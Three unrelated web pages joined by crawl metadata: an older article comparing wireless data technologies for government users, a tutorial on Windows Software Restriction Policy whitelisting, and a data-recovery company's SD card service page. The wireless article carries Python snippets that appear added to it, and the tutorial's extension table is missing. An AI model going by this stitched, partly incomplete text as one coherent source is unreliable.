Wireless technology has exploded in the last several years, and it provides an expanding array of technology choices. Wireless technology refers to the transmission and receipt of information (voice, fax, data) using radio frequency (RF) energy. It can be point-to-point, analogous to telephone or leased-circuit connections, or broadcast, such as commercial television and radio. However, not all commercial wireless technologies are suitable for government users, and a few are only now becoming viable in this regard. For both voice and data, wireless networks are merely an extension of wired networks from the user perspective. Within the context of government users and applications, what follows are several of the most pervasive and applicable wireless technologies available today and a brief glimpse at some promising technologies for tomorrow.

Specialized Mobile Radio (SMR)

The Federal Communications Commission (FCC) established specialized mobile radio (SMR) services in the mid-1970s by allocating a portion of the 800MHz frequency band for private land mobile-radio systems. SMR networks are operated by commercial system providers. Types of services provided include voice radio networks (including dispatch service), mobile packet data networks, and telephone and paging services. Initially developed around interstate highways and population centers, some of these networks have extended their service to include outlying areas. The main differentiators for SMR networks are transmission speed, transmission protocols, coverage areas and cost.

SMRs specializing in data communications typically use a packet-switching protocol. Data is segmented and routed in discrete data envelopes called "packets," each with its own control information for routing, sequencing and error checking. Packet switching allows a communications channel to be shared by multiple users, each using the circuit only for the time required to transmit a single packet. Users are able to maintain a continuous connection to the network without permanently tying up a channel (a small illustration of the packet idea appears at the end of this section). Some advantages and disadvantages of SMR systems are summarized below:

Specialized Mobile Radio
Advantages:
* Cellular-style roaming throughout coverage area
* Easy access to public switched telephone network
* Supports short, frequent messages well (e.g., data inquiries, text messages)
* Services designed specifically for data
Disadvantages:
* Coverage lacking in less-populated areas
* Priority access to regular telephone networks not available for government users
* Potentially significant ongoing costs for usage fees
* Does not support sustained data transfers well (e.g., long reports, images)

Today, over 80 percent of the customers who subscribe to SMR services are in the construction, service or transportation industries. However, over the last 10 years, SMR network providers have increased their marketing efforts to public agencies.
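To make the packet idea concrete, here is a minimal Python sketch (an illustrative toy, not any SMR vendor's actual protocol) that splits a message into numbered packets carrying the kind of sequencing and error-checking information described above, then reassembles and verifies them:

```python
import zlib

def packetize(message: bytes, payload_size: int = 64):
    """Split a message into packets, each carrying sequencing and
    error-checking information, as in a packet-switched network."""
    chunks = [message[i:i + payload_size]
              for i in range(0, len(message), payload_size)]
    return [{
        "seq": seq,                    # sequencing
        "total": len(chunks),          # lets the receiver know when it's done
        "crc": zlib.crc32(chunk),      # error checking
        "payload": chunk,
    } for seq, chunk in enumerate(chunks)]

def reassemble(packets):
    """Verify each packet's checksum and restore the original message."""
    ordered = sorted(packets, key=lambda p: p["seq"])
    for p in ordered:
        assert zlib.crc32(p["payload"]) == p["crc"], "corrupt packet"
    return b"".join(p["payload"] for p in ordered)

assert reassemble(packetize(b"status inquiry from unit 12")) == \
    b"status inquiry from unit 12"
```

Because each packet is self-describing, many users can interleave their packets on one shared channel, which is exactly what lets SMR data networks avoid tying up a circuit per user.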
Spread Spectrum

Spread spectrum is a modulation technique that takes an input signal, mixes it with frequency modulated (FM) noise and "spreads" the signal over a broad frequency range. The signal then hops from frequency to frequency at defined intervals, resulting in the spread signal having greater bandwidth than the original message. Spread-spectrum receivers have unique user codes to recognize, acquire and "de-spread" a spread signal, thus returning the signal to the original message. Popularly available spread-spectrum data networks use a mesh topology of shoebox-size radio transceivers (microcell radios), which are mounted to streetlights or utility poles. These microcells are strategically placed every quarter- to half-mile in a checkerboard pattern. Each microcell radio employs multiple frequency-hopping channels and uses a randomly selected hopping sequence (a small sketch of such a sequence follows this section). Frequency hopping allows for a very secure network. These types of networks use digital packet-switched protocols similar to those employed by SMRs. Microcells transmit messages to wired access points (WAPs). WAPs convert the data packets into a format for transmission to a wired Internet protocol network backbone. Each WAP and the microcells that report to it can support thousands of subscribers.

The major spread-spectrum data provider is Metricom. Its system transmits data at a raw speed of 100 kilobits per second (Kbps), with throughput averaging 28.8Kbps. Planned system upgrades will increase throughput up to 40Kbps using existing radio modems. Metricom also plans to offer service with throughput up to 128Kbps. This service will use spectrum in the 2.3GHz range and will require a radio modem upgrade. Some advantages and disadvantages of spread-spectrum systems are summarized below:

Spread Spectrum Systems
Advantages:
* High bandwidth
* Secure communications
* Low initial cost
* Easy for provider to expand coverage
Disadvantages:
* Limited availability for wide area
* Must be quasi-stationary to use
* Recurring monthly costs
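The randomly selected hopping sequence mentioned above can be sketched in a few lines of Python. This is a conceptual illustration only (not Metricom's actual algorithm): two radios that share a seed derive the same channel order, while the pattern looks unpredictable to anyone without it.

```python
import random

def hopping_sequence(shared_seed: int, num_channels: int, hops: int):
    """Derive a pseudo-random frequency-hopping schedule.

    A transmitter and receiver that share `shared_seed` compute the
    identical channel sequence and so stay synchronized; to anyone
    without the seed, the hopping pattern appears random.
    """
    rng = random.Random(shared_seed)
    return [rng.randrange(num_channels) for _ in range(hops)]

# Both ends derive the same 10-hop schedule over 79 channels.
tx = hopping_sequence(shared_seed=0xC0FFEE, num_channels=79, hops=10)
rx = hopping_sequence(shared_seed=0xC0FFEE, num_channels=79, hops=10)
assert tx == rx
```

This shared-secret synchronization is the source of the "secure communications" advantage listed above: an eavesdropper who cannot predict the next channel hears only fragments.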
By most estimates, more than 90 percent of traffic on the U.S. cellular telephone network is voice, but data transmissions are increasing rapidly. In 1995, there were approximately 1 million wireless-data users, with the market projected to grow to nearly 10 million users by the year 2000. While its popularity and coverage have expanded since Advanced Mobile Phone Service (AMPS) was introduced in the early 1980s, analog cellular radio is still the base technology used for cellular service today. There are currently two methods for sending data over cellular networks: cellular digital packet data (CDPD) and cellular switched-circuit data (CSCD). Each has distinct advantages depending on the type of application, the amount of data to send or receive, and geographic coverage needs.

CDPD is currently available to roughly 50 percent of the population base. Two methods to transmit data are used, depending upon the service provider's network architecture. Some providers have radio channels dedicated to data transmission installed at existing voice cellular sites. Others use voice cellular channels and interleave data messages within the unused portion of voice radio signals. To use a CDPD data service, users require a laptop computer, a connector cable and a CDPD radio modem. Radio modems come in a PC-card format or connect to the user device with a serial cable. Regardless of the method used, messages are broken up into discrete packets of data and transmitted continuously over the network. Messages are then "reassembled" into the original message at the receiving device. This technology supports roaming and is especially attractive for multicast (e.g., one-to-many) service, allowing updates to be periodically broadcast to all users. Users log on once per day to register on the network; messages and transmissions automatically locate them. CDPD supports TCP/IP and is most appropriate for short bursts of data, such as e-mail, credit-card authorization or database queries. Currently, CDPD provides data rates of 19.2Kbps with throughput averaging 14.4Kbps. Next-generation systems will allow higher data rates.

Nationwide, approximately 45 percent of CDPD agencies are in public safety. Many of these users are using the service as an adjunct to their existing private mobile-data systems. Typical applications include database inquiry, automated field reporting and unit-to-unit messaging. Although there are only limited examples of use in public safety, CDPD does provide the capability for electronic dispatch of units. Major CDPD providers generally have roaming agreements to allow users to access the service when outside their home coverage area. Some advantages and disadvantages of CDPD systems are summarized below:

Cellular Digital Packet Data
Advantages:
* Supports short, frequent messages well
* Inexpensive end-user equipment
* Available today
* Protocol provides easy access to the Internet
* Transparent roaming available
* Moderate data rates (19.2Kbps)
* Secure (data encryption provided by carrier)
* Service in major population areas
* System designed for data
Disadvantages:
* Not yet fully deployed
* Coverage not available in less-populated areas
* Priority access not available for government users
* Potentially significant ongoing costs
* Newer technology
* Does not support sustained data transfers well

Cellular switched-circuit data is today's most popular and widely available option for wireless data transfer. It creates a dedicated connection or circuit over the analog cellular network only for the duration of the call, in contrast to the shared channel used by a packet-switched network. Transfer rates are up to 14.4Kbps. Transferring data with CSCD requires a laptop computer, a data-capable cellular telephone, a connector cable and a cellular modem (typically a PC card). As with voice service, charges are determined by the duration of calls, making CSCD cost-effective for larger data transmissions with file transfer, fax and e-mail applications. Cellular switched-circuit data is a good approach for session-based interactive transactions, such as logging onto a host application or accessing a private intranet. CSCD networks offer low security, but this can be improved through user-provided encryption applications. CSCD is compatible with most off-the-shelf modem software. Since this service is available wherever analog cellular service is available, there is a variety of service providers. Some advantages and disadvantages of CSCD systems are summarized below:

Cellular Switched-Circuit Data (CSCD)
Advantages:
* Inexpensive and easy-to-use user devices
* Transparent roaming
* Service in major population areas (covers 90 percent to 95 percent of population base)
* Supports sustained data transfers well
* Voice and data capabilities
* Extensive applications software
* Good developer support
Disadvantages:
* Dial-up connection required for each data message
* Does not support short, frequent messages well
* Priority access not available to government users
* Potentially significant ongoing costs
* Reliability (transmissions can drop when moving between cells)
* Roaming can be expensive
* Security (data encryption is an add-on)

Personal Communications Systems

Personal communications systems (PCS) are the next generation of terrestrial-based commercial wireless communications, providing inexpensive voice and data services. PCS include a broad range of telecommunications services intended to provide subscribers with enhanced features and wireless access to the public switched network. "One person, one number" has become the familiar motto of PCS in recent years. The Personal Communications Industry Association predicts that there will be more than 167 million subscribers to PCS services by 2003.
To accommodate this expected demand, the FCC has allocated both narrowband (901-902MHz, 930-931MHz, 940-941MHz) and broadband (1850-1990MHz) frequency spectra for PCS services. Blocks of spectra were auctioned by the FCC between 1995 and 1997. PCS design is similar to cellular design, but PCS use all-digital technology. PCS systems use a large number of low-power transmission sites to support high levels of data throughput. Examples of enhanced services available from PCS providers include voice mail; call hold, forwarding, waiting, and three-way calling; paging; text messaging; distinctive ringing; fraud control (through authentication and encryption); and better reception than analog cellular within the coverage area. Current data communication capability is provided via a dial-up connection, similar to switched-circuit cellular.

The jury is still out regarding the effectiveness of PCS for wide-area use. While existing PCS services rely on cellular-type architectures, combinations of PCS services with satellite and other technologies may provide greater functionality in the future. However, since providers of PCS services have designed their systems using competing technologies, wide-area roaming may be difficult. Some advantages and disadvantages of PCS are summarized below:

Personal Communications Systems (PCS)
Advantages:
* Telephone interconnect/easy access to Public Switched Telephone Network (PSTN), or "regular" telephony
* Support for high-volume data applications
* Increased competition, lower prices
* Difficult to eavesdrop
* Advanced digital features
* Low-weight, multipurpose, low-cost devices
* System design allows for reduced power consumption, longer battery life
Disadvantages:
* Low power, requiring numerous sites for coverage (limited initial coverage)
* Priority access not available for government users
* Competing technologies inhibit roaming
* Potentially high recurring costs

Satellite Systems

Satellites function as radio repeaters in the sky. Radio signals are beamed to the satellite from an earth station via an uplink. At the satellite, the signal is filtered, converted and retransmitted via a downlink to ground-station or mobile receivers. Satellites can receive and retransmit thousands of signals simultaneously, from simple digital data to the most complex television programming. Satellite systems provide effective and ubiquitous mobile communications for users requiring a large coverage area (e.g., transportation, military, exploration, and maintenance). Recently, satellite companies have begun to show a higher level of interest in the public-sector market. Two main types of satellite systems offer communications services applicable to government users: geosynchronous earth orbit (GEO) and low earth orbit (LEO) satellites. Satellite system providers use both circuit-switched and packet-switched technologies.

GEOs orbit the earth at an altitude of approximately 22,300 miles, traveling at the same angular speed as the earth rotates on its own axis. Thus, GEOs appear to remain "stationary" relative to a reference point on the earth. A single GEO can "see" approximately 40 percent of the Earth's surface. Three such satellites, spaced at equal intervals, can provide global coverage. Due to a GEO satellite's distance from Earth, reception of the repeated signal can be delayed by roughly 120 to 250 milliseconds for each outbound and inbound transmission. Data throughput rates range from 4.8Kbps to 9.6Kbps.
In addition, these large distances cause GEO transmissions to require more power than closer terrestrial or LEO communications. This requirement has made it difficult to produce convenient hand-held radios that are able to access GEO satellites. GEO service vendors have historically focused on the video, data broadcasting and long-haul transportation industries.

LEO satellites do not remain stationary above the Earth. They orbit 300 to 900 miles above the Earth's surface at speeds of 16,500 miles per hour. A LEO system is made up of satellites all traveling at the same speed and the same altitude. Satellites are positioned relative to each other such that each covers a portion of the Earth's surface. As the satellites travel around the world, their coverage area moves with them. As one satellite starts to leave a certain geographic area, it "hands off" communications to the next satellite as it enters the area, maintaining continuous coverage. A network control system interconnects the LEO satellites and links individual satellites. Since LEOs are closer to the Earth's surface, less power is required to send a message to them. User devices can be smaller and less sophisticated than those designed for use with GEO systems. Significant efforts are currently under way to develop new LEO systems, with the earliest service anticipated for later this year. LEO vendors include:

* Globalstar -- A joint effort between Loral and Qualcomm, offering narrowband, dual-mode telephones with paging, low-speed data and position-location services.
* ECCO -- Designed by Constellation Communications, ECCO will offer narrowband, dual-mode telephones with paging, low-speed data and fax services.
* Iridium -- This LEO service provider is from Motorola. Iridium will offer narrowband, dual-mode telephones with paging, low-speed data, and fax services.
* Teledesic -- Co-founded by Microsoft's Bill Gates and Craig McCaw of McCaw Communications. It will offer broadband multimedia, videoconferencing and Internet services.

The tables below summarize some of the advantages and disadvantages of geosynchronous and low earth orbit satellites:

Geosynchronous Earth Orbit (GEO) Satellites
Advantages:
* Access to PSTN
* Many advanced digital features
* Accessibility from remote areas
* Ability to support voice and data
Disadvantages:
* Reduced coverage in "urban canyons"/line-of-sight
* Limited range of user equipment
* Low data-transmission rates
* High user equipment costs
* High, recurring costs
* Significant propagation delay
* Single point of failure
* Unproven for public safety and local government use

Low Earth Orbit (LEO) Satellites
Advantages:
* Advanced digital features
* Little propagation delay
* Access to PSTN
* Ability to support voice and data
Disadvantages:
* Entire system must be in place before operable
* Requires enormous infrastructure
* Limited range of user equipment
* Unproven; features and capabilities unclear
* Potentially high recurring and equipment costs

Evaluating wireless technology can be complicated and time-consuming. However, focusing on users' functional needs can enable more effective comparison of alternatives. Some specific areas to consider for wireless technology include:

* Application Integration -- Does the technology allow a smooth interface with current and planned applications? Would it facilitate software modifications if changes in system protocol or operational requirements occur?
* Performance -- Software and hardware components of the network must be responsive to user needs. Sensitivity to loading requirements, peak user demand and the ability to transfer information in the time frame required are critical parameters.
* Availability/Reliability -- On an annual basis, what is the percentage of time that the network is available for processing user requests? How does the availability change during emergencies or other periods of peak usage?
* Security -- Careful consideration must be given to the ability of system managers to control access to and use of the network on a user-by-user basis.
* User Interface/Device -- The types of devices available for use on the network and their functionality -- including features, indications, ergonomic capabilities, vendor sources, etc. -- should be compared to end-user requirements.
* Coverage -- The percentage of the service area over which the network can be used, usually defined by geographic areas with associated reliabilities for accessing the system. How does the coverage area compare to user-defined operating areas?

Gregory Walker is a senior consultant with The Warner Group, a Woodland Hills, Calif.-based management consulting firm specializing in the public sector. He has significant experience evaluating wireless voice and data systems and can be reached at (818) 710-8855.
<urn:uuid:68c2e6fa-b94e-4903-b0b5-cd31e2a30793>
CC-MAIN-2017-04
http://www.govtech.com/featured/Governments-Surfing-the-Wireless-Wave.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00052-ip-10-171-10-70.ec2.internal.warc.gz
en
0.899752
3,791
3.265625
3
In Windows it is possible to configure two different methods that determine whether an application should be allowed to run. The first method, known as blacklisting, is when you allow all applications to run by default except for those you specifically do not allow. The other, and more secure, method is called whitelisting, which blocks every application from running by default, except for those you explicitly allow.

With the wide distribution of computer ransomware and other malware infections and the high costs of recovering from them, a very strong computer protection method is whitelisting. This allows you to block all programs by default and then set up rules that specifically allow only certain programs to run. Though easy to set up initially, whitelisting can be burdensome, as you will need to add new rules every time you install a new program or want to allow a program to run. Personally, I feel that if you are willing to put the time and effort into using whitelisting, the chances of a computer infection damaging your computer become minimal.

This tutorial will walk you through setting up whitelisting using Software Restriction Policies so that only specified applications are able to run on your computer. Though this guide is geared towards individual users, the same approach can be used in the enterprise by pushing these policies to a Windows domain.

To get started whitelisting your applications, you need to open the Security Policy Editor, which configures the Local Security Policies for the machine. To do this, click on the Start button and then type secpol.msc into the search field as shown below. When secpol.msc appears in the search list, click on it to start the Local Security Policy editor.

You should now see the Local Security Policy editor as shown below. To begin creating our application whitelist, click on the Software Restriction Policies category. If you have never created a software restriction policy in the past, you will see a screen similar to the one below. To create the new policy, right-click on the Software Restriction Policies category and select the New Software Restriction Policies option as shown below. A new Software Restriction Policy will now be created as shown below.

The first thing you need to do is configure the Enforcement section. This section allows us to specify general settings on how these restriction policies will be configured. To get started, click on the Enforcement object type as indicated by the blue arrow above. I suggest that you leave the settings as they are for now. This allows you to create a strong policy, without the issues that may be caused by blocking DLLs. When you are done configuring these settings, click on the OK button.

You will now be back at the main Software Restriction Policies window as shown in Figure 5. We now want to configure what file types will be considered an executable and thus blocked. To do this, click on the Designated File Types object. This will open the properties window for the designated file types that will be considered executables and therefore blocked by the software restriction policy that you are creating.

Unfortunately, the list is not as exhaustive as you would like, and it includes an extension that should be removed. First, scroll through the list of file extensions and remove the LNK extension from it. To remove the extension, left-click on it once and then click on the Remove button.
If you do not remove this extension, then all shortcuts will fail to work after you create your whitelist.

Now you want to add some extra extensions that are known to be used to install malware and ransomware. To add an extension, simply add it to the File Extension field and click on the Add button. When adding an extension, do not include the period. For example, to block PowerShell scripts, you would enter PS1 into the field and click on the Add button. Please add the following extensions to the designated file types:

[Table: extensions to add to the File Type list]

When you are done adding the above extensions, click on the Apply button and then the OK button. We will now be back at the main Software Restriction Policies section as shown in Figure 8 below.

At this point, you need to configure the default policy that decides whether the file types configured in Figure 7 will be automatically blocked or allowed to run. To do this, click on the Security Levels option as indicated by the blue arrow below. When you double-click on the Security Levels category, you will be brought to the screen below, which has three security levels you can apply to your software restriction policies. In order to select which level should be used, you need to double-click on the particular level and set it as the default. Below are the descriptions for each type of security level:

Disallowed: All programs, other than those you allow by the rules you will configure, will not be allowed to run regardless of the access rights of the user.

Basic User: All programs should execute as a normal user rather than as an Administrator.

Unrestricted: All programs can be run as normal.

Since you want to block all applications except those that you whitelist, you want to double-click on the Disallowed button to enter its properties screen as shown below. In the above properties screen, to make it so all applications will now be blocked by default, please click on the Set as Default button. Then click on the Apply and OK buttons to exit the properties screen.

We will now be back at the Security Levels list, and almost every program will now be blocked from executing. For example, if you try to run Internet Explorer, you will receive a message stating that "This program is blocked by group policy." as shown below.

Now that you have configured Windows to block all applications from running, you need to configure rules that allow your legitimate applications to run. The next section will explain how to create path rules so that the applications you wish to allow to run are whitelisted.

If you followed the previous steps, Software Restriction Policies are now enabled and blocking all executables except those located under C:\Program Files and C:\Windows. Those two directories are automatically whitelisted by two default rules that are created when you set up Software Restriction Policies. Obviously, in order to have a properly working machine you now need to allow, or whitelist, other applications. To do this, you need to create additional rules for each folder or application you wish to allow to run.

In this tutorial, we are going to add a new Path Rule for the C:\Program Files (x86) folder, as that also needs to be whitelisted for 64-bit versions of Windows. While in the Local Security Policy editor, click on the Additional Rules category under Software Restriction Policies as shown below. As you can see from above, there are already two default rules configured to allow programs running under C:\Windows and C:\Program Files to run.
If you are running a 64-bit version of Windows, you now want to add a further rule that will allow programs under the C:\Program Files (x86) folder to run as well. To do this, right-click on an empty portion of the right pane and click on New Path Rule... as shown below. This will open up the New Path Rule Properties dialog as shown below.

As you want to create a path rule for C:\Program Files (x86), you should enter that path into the Path: field. Then make sure the Security Level is set to Unrestricted, which means the programs in it are allowed to run. If you wish, you can enter a short description explaining what this rule is for in the Description field. When you are finished, the new rule should look like the one below. When you are ready to add this rule, click on the Apply and then OK buttons to make the rule active. You will now be back at the Rules page, the new C:\Program Files (x86) rule will be listed, and programs located in that folder will now be allowed to run.

You now need to make new rules for the other programs that you wish to allow to run in Windows. For example, if you play games with Steam, you should follow the steps above to add an unrestricted rule for the C:\Program Files\Steam\ folder. In the next two sections, I have provided tips and other types of rules that can be created to whitelist programs. I suggest you read them to take advantage of the full power of Software Restriction Policies. As always, if you need help with this process, please do not hesitate to ask in our tech support forums.

When adding a path rule that is a folder, it is important to note that any subfolder will also be included in the rule. That means if you have applications stored in C:\MyApps and create a path rule that specifies that folder as unrestricted, then all subfolders will be allowed to run as well. So not only will C:\MyApps\myapp.exe be allowed to run, but C:\MyApps\games\gameapp.exe will be allowed to execute as well.

To make it easier when creating rules, it is also possible to use wildcards to help you specify what programs should be allowed to run. When using wildcards, you can use a question mark (?) to denote a single wildcard character and an asterisk (*) to denote a series of wildcard characters. For example, if you have a folder of executables that you wish to whitelist, you can do so by using a wildcard path rule like this: C:\MyApps\*.exe. This rule would allow all files that end with .exe to execute, but not allow executables in subfolders to run. You can also use a path rule that specifies a single wildcard character, like C:\MyApps\app?.exe. This rule would allow C:\MyApps\app6.exe to run, but not C:\MyApps\app7a.exe.

It is also possible to use environment variables when creating path rules. For example, if you wish to allow a folder under all the user profiles, you can specify a rule like %UserProfile%\myfolder\*.exe. This would only allow executables under that particular folder to execute, but would expand %UserProfile% to the correct folder for whoever is logged into the computer. Last, but not least, if you wish to run executables from a network share, then you need to specify the full UNC path in the rule. For example, \\Dev-server\Files.
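To sanity-check a planned set of path rules before typing them into the policy editor, the matching behavior described above can be approximated in a few lines of Python. This is an illustrative approximation, not Microsoft's actual implementation, and the paths in the examples are hypothetical:

```python
import fnmatch
import os

def srp_path_matches(rule_path: str, exe_path: str) -> bool:
    """Approximate SRP path-rule matching.

    - Environment variables such as %UserProfile% are expanded
      (os.path.expandvars handles the %VAR% form on Windows).
    - '?' matches one character and '*' a run of characters.
    - A rule naming a folder also covers everything beneath it.
    """
    rule = os.path.expandvars(rule_path).lower().replace("/", "\\")
    target = os.path.expandvars(exe_path).lower().replace("/", "\\")
    if "*" in rule or "?" in rule:
        return fnmatch.fnmatchcase(target, rule)
    # Folder rule: match the folder itself or any path under it.
    return target == rule or target.startswith(rule.rstrip("\\") + "\\")

# Hypothetical example checks, mirroring the cases described above:
print(srp_path_matches(r"C:\MyApps", r"C:\MyApps\games\gameapp.exe"))   # True
print(srp_path_matches(r"C:\MyApps\app?.exe", r"C:\MyApps\app6.exe"))   # True
print(srp_path_matches(r"C:\MyApps\app?.exe", r"C:\MyApps\app7a.exe"))  # False
```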
When creating rules, it is also possible to create two other types of rules, called Certificate Rules and Hash Rules. These rules are described below.

Certificate Rule: A certificate rule is used to allow any executable to run that is signed by a specific security certificate.

Hash Rule: A hash rule allows you to specify a file that can be run regardless of where it is located. This is done by selecting an executable when creating the rule; certain information about the file will be retrieved by SRP and saved as part of the rule. If any other executable on the computer matches the stored file hash and information, it will be allowed to run.

Note: Microsoft has stated that Certificate Rules could cause performance issues if used, so only use them if absolutely necessary.
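The key idea behind a hash rule (identify a program by its contents rather than its location) is easy to demonstrate. The snippet below is purely illustrative: SRP stores its own internal hash format, whereas this sketch uses SHA-256.

```python
import hashlib

def file_digest(path: str, algo: str = "sha256") -> str:
    """Hash a file's contents; the result identifies the file no matter
    where on disk it lives."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(65536), b""):
            h.update(block)
    return h.hexdigest()

# The same executable copied to two locations yields the same digest,
# which is why a hash-based allow rule follows the file around while a
# path rule does not.
```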
<urn:uuid:3fb83028-797f-444b-ac21-3525269bb6a8>
CC-MAIN-2017-04
https://www.bleepingcomputer.com/tutorials/create-an-application-whitelist-policy-in-windows/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00357-ip-10-171-10-70.ec2.internal.warc.gz
en
0.921225
2,661
2.53125
3
Inside your phone, digital camera, GoPro, or other mobile device, you're likely to find an SD card or a microSD card. These tiny packages can hold a deceptively large amount of data. As you use your phone or camera, your SD card can fill up with priceless pictures and videos. But SD cards can fail, just as any other storage device can. If you've lost data due to a failed flash memory card, our SD Card Recovery Service engineers can help.

What Is an SD Card?

In general, memory cards are thin, light data storage devices. Their particular form factor makes them ideal as removable storage for small devices. You can pop a memory card into your camera, take enough pictures to fill it up, and then pop the card out, empty out its contents, and slip it back in.

An SD card might just look like one giant chip to a layperson, but the outside is actually a shell. Crack open the shell, and you'll see something very similar to the inside of a typical USB flash drive. You will find one or more flash memory chips, along with a controller chip soldered to a printed circuit board. The NAND flash memory chip stores all of your data. When you plug your SD card into your computer, camera, or other device, data flows to and from the memory chip, organized and regulated by the controller chip. The controller keeps track of any bad blocks on the NAND chip as one of its many duties.

What Is a microSD Card?

The microSD card is the poster child for the huge strides data storage technology has taken over the decades. It is scarcely bigger than one of your fingernails, barely thicker than a sheet of paper, and yet it can store up to hundreds of gigabytes of data. If you could travel back in time to the 1950s and show the people at IBM the latest 256 GB microSD card, they'd probably laugh in your face.

A microSD card is similar in design to a monolithic USB flash drive. All the components it needs—the NAND chip, the controller, and the interface—are soldered together into a deceptively small package. Some of the microSD card's larger siblings take advantage of monolithic technology as well (leaving you with a lot of empty space inside the SD card's casing).

How Do SD Cards Fail?

Generally, SD cards and microSD cards are a bit less vulnerable to physical damage than USB flash drives. In many USB flash drives, the USB plug has a frail connection to the PCB that can easily be damaged. Since an SD card's electrical contacts are built into the PCB, that is one less point of failure. Also, SD cards are usually tucked away very discreetly in their devices, so it's hard for them to be accidentally broken while in use.

[Image: An SD card with a monolithic design; a hairline fracture runs across it due to physical trauma.]

But while an SD card can survive a fall that would kill a hard disk drive, it might not fare so well if it gets stepped on, driven over, etc. This could crack the PCB, or even the NAND chip itself. A cracked NAND chip is roughly equivalent to a hard drive platter with rotational scoring: it's toast.

An SD card can also fail as a result of a power surge. It only takes a surge lasting three nanoseconds to short out a PCB. If an SD card is plugged into a device when a power surge occurs, the PCB can be shorted out. This traps all of the data on the NAND chip, with no way for anyone outside of an advanced data recovery lab to retrieve it.

Logical failures in SD cards are more common than physical failures.
Like most removable storage media, SD cards aren't supposed to be removed while in use, or without being safely ejected. Removing an SD card without warning can result in file corruption or corruption of the partition table or boot sector. A corrupted boot sector or partition table will make an SD card appear to be blank. Files can also be deleted from an SD card, or the card can be accidentally reformatted.

SD cards typically come out of the factory with FAT16 or FAT32 filesystems. Unlike proprietary Mac, Windows, and Linux filesystems, FAT filesystems play nicely with just about everyone. A user can reformat their SD card with any other filesystem. Different filesystems have different features, so changing an SD card's filesystem can provide some benefits. However, this can decrease the performance or lifespan of an SD card. Many of the controller chip's error correction and wear leveling techniques are based on the assumption that the card is formatted with a FAT filesystem. Replacing the filesystem can lead an otherwise-healthy SD card to die before its time.

The SD Card Recovery Process

Since so many of the common ways SD cards fail are logical, SD card recovery tends to play by many of the same rules as logical recovery from other devices. Regardless of the differences between the underlying hardware, recovering data from an accidentally reformatted hard drive and SD card follows roughly the same process. Whenever you delete data from, accidentally reformat, or corrupt the boot sector of something, you are only making a small change to its filesystem. Deleting a file doesn't automatically erase it, but rather marks the space taken up by it as "unused" (a toy illustration of this idea appears at the end of this article). Reformatting does this on a larger scale, but can also partially or completely erase the old filesystem architecture. And it only takes a single corrupt sector to make an SD card seem to be blank.

[Image: The inside of a damaged SD card, with a visible crack in the PCB. Our SD card recovery service engineers were able to remove the NAND chip and extract its contents.]

Even though these changes are small, they have big consequences. It is the job of our SD card recovery technicians to use our specialized data recovery tools and techniques and go where you cannot. We use HOMBRE, proprietary software designed for and by our data recovery experts, to investigate these changes to the filesystem and salvage the data from your failed SD or microSD card.

In the event that your SD card's PCB is damaged, our engineers must gain direct access to the NAND chip and piece its contents back together, bypassing the failed PCB and controller. This can involve removing the NAND chip and connecting it to a chip reader, or in the case of microSD cards, soldering tiny wires to specific contact points on the device.

Why Choose Gillware for My SD Card Recovery Services Needs?

Our technicians are highly skilled and well trained in the fundamentals of the most cutting-edge flash memory technologies. Gillware's suite of powerful proprietary tools for logical analysis and data recovery, combined with our skilled data recovery technicians, makes us your best choice for failed SD card recovery services. Furthermore, here at Gillware Data Recovery, our entire SD card recovery process is financially risk-free. We even offer to cover the cost of inbound shipping, and the only time we ever show you a bill is after we've recovered everything we can from your failed SD card.
There are no evaluation fees, and you only pay for our efforts if the data you need has been recovered.

Ready to Have Gillware Assist You with Your SD Card Recovery Services Needs?

Best-in-class engineering and software development staff: Gillware employs a full-time staff of electrical engineers, mechanical engineers, computer scientists and software developers to handle the most complex data recovery situations and data solutions.

Strategic partnerships with leading technology companies: Gillware is proud to be a recommended provider for Dell, Western Digital and other major hardware and software vendors. These partnerships allow us to gain unique insight into recovering from these devices.

RAID array / NAS / SAN data recovery: Using advanced engineering techniques, we can recover data from large-capacity, enterprise-grade storage devices such as RAID arrays, network attached storage (NAS) devices and storage area network (SAN) devices.

Virtual machine data recovery: Thanks to special engineering and programming efforts, Gillware is able to recover data from virtualized environments with a high degree of success.

SOC 2 Type II audited: Gillware has been security audited to ensure data safety, meaning all our facilities, networks, policies and practices have been independently reviewed and determined to be completely secure.

Facility and staff: Gillware's facilities meet the SOC 2 Type II audit requirements for security to prevent entry by unauthorized personnel. All staff are pre-screened, background checked and fully instructed in the security protocol of the company.

We are a GSA contract holder: We meet the criteria to be approved for use by government agencies. GSA Contract No.: GS-35F-0547W

Our entire data recovery process can be handled to meet HIPAA requirements for encryption, transfer and protection of e-PHI.

No obligation, no up-front fees, free inbound shipping and no-cost evaluations: Gillware's data recovery process is 100% financially risk-free. We only charge if the data you want is successfully recovered.

Our pricing is 40-50% less than our competition: By using cutting-edge engineering techniques, we are able to control costs and keep data recovery prices low.

Instant online estimates: By providing us with some basic information about your case, we can give you an idea of how much it will cost before you proceed with the recovery.

We only charge for successful data recovery efforts: We work with you to define clear data recovery goals for our technicians, and only charge you upon successfully meeting these goals and recovering the data that is most important to you.

Gillware is trusted, reviewed and certified: Gillware has the seal of approval from a number of different independent review organizations, including SOC 2 Type II audit status, so our customers can be sure they're getting the best data recovery service possible. Gillware is a proud member of IDEMA and the Apple Consultants Network.
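As noted in "The SD Card Recovery Process" above, deleting a file merely flags it in the filesystem. The toy Python model below (a hypothetical illustration, unrelated to Gillware's HOMBRE software) mimics FAT-style deletion: the directory entry is marked free, but the file's bytes remain on the medium until they are overwritten.

```python
# Toy model of FAT-style deletion: the directory entry is flagged,
# but the file's data blocks are left untouched on the medium.

DELETED_MARKER = 0xE5  # FAT marks a free directory entry with this byte

directory = {"IMG_0001.JPG": {"first_byte": ord("I"), "blocks": [7, 8, 9]}}
blocks = {7: b"\xff\xd8...", 8: b"...", 9: b"...\xff\xd9"}  # JPEG data

def delete_file(name: str) -> None:
    """'Delete' a file by flagging its directory entry; its data blocks
    become reusable, but their contents are not erased."""
    directory[name]["first_byte"] = DELETED_MARKER

delete_file("IMG_0001.JPG")
# The picture's bytes are still present, and recoverable, until the
# blocks are reused:
assert blocks[7].startswith(b"\xff\xd8")
```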
<urn:uuid:87eab5cc-b51c-42d6-aaa1-1ccc20c04e74>
CC-MAIN-2017-04
